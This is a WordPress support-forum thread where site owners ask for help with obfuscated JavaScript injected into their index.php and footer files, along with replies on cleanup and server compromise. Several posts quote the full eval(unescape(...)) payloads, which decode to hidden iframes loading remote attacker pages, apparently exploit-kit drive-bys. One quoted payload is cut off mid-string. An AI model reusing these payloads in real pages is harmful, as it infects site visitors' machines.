hello, in some web site I designed, I have a problem follow as, these codes are inserted into my web pages? What can I solve this problem, thanks....
<!-- /ad --><Script>
<!--
var d=document;
eval( unescape( "%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%36%32%39%32%29%2b%27%39%63%36%34%32%34%5c%27%20%77%69%64%74%68%3d%31%35%33%20%68%65%69%67%68%74%3d%35%36%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
//-->
</Script>
harffull codes (eval( unescape( "%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5f%) (11 posts)
-
samsun55
Posted 1 year ago # -
planningqueen
Posted 1 year ago #I have the same error as well which would have occurred at about the same time. Have you found a solution?
-
marsie
Posted 1 year ago #Same issue here. I have been searching online for a total solution to removing this from my Wordpress installation. This has happened to me once before -- and the malware code was in my footer.php file. I'm annoyed because it came back... Not sure why or how! Can anyone help?
This is the code appended after my closing </body> tag:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%64%30%38%34%65%37%30%64%62%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%33%36%30%30%29%2b%27%39%61%62%34%38%34%63%62%31%36%5c%27%20%77%69%64%74%68%3d%34%30%30%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%35%66%38%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%33%37%38%29%2b%27%39%63%39%5c%27%20%77%69%64%74%68%3d%31%36%32%20%6 -
Posted 1 year ago #Typo -- I found the malicious code in both: index.php and wp-admin/index.php (not footer.php).
-
hallsofmontezuma
Posted 1 year ago #It's compiled javascript. Often, WordPress theme designers will include it in their themes to keep you from removing credits or ads that they embed without your knowledge. It could also be the fruit of a malicious attack. Just remove it in your code, and then install the security plugin for WordPress to help keep it from happening in the future.
-
Posted 1 year ago #Update: I also found the damn code on every other index.php file in my entire server!
Additional corrupted files: wp-content/index.php, theme1/index.php, theme2/index.php (and every other theme index file).
I am manually deleting the malicious code on every file... But I still can't figure out where this came from! I did some reading online and I am thinking it might be attributable to my SiteMeter counter (but am not positive).
-
Posted 1 year ago #hey hallsofmontezuma, i'll try the security plugin you suggested. thanks!
-
Posted 1 year ago #hallsof montezuma. thanks for the advice - i had found the code and it was in my footer and once removed my feed became valid. i will also check out the security plug in.
I have another problem though in that my stats counter and wordpress stats are no longer working. this happened today but I made the changes to the footer on the weekend. could there be a link?
-
Update: I also found the damn code on every other index.php file in my entire server!
This indicates that somebody cracked into your server itself and ran some sort of script which added those lines everywhere it could find to add them.
WordPress security is only as good as the box's own security.
-
cave-bit
Posted 1 year ago #the problem is ever equal.Only admin inserted code in file width manage file in admin page.
If code change someone work....
See in your users-table (mysql) if exist phantom user...(width WordPress name for example..........) -
nebhead
Posted 11 months ago #I also have this issue on my site. I discovered that all of my index.php files were modified. Anyone know if there are any rogue WP Plugins that may be suspect?
Topic Closed
This topic has been closed to new replies.
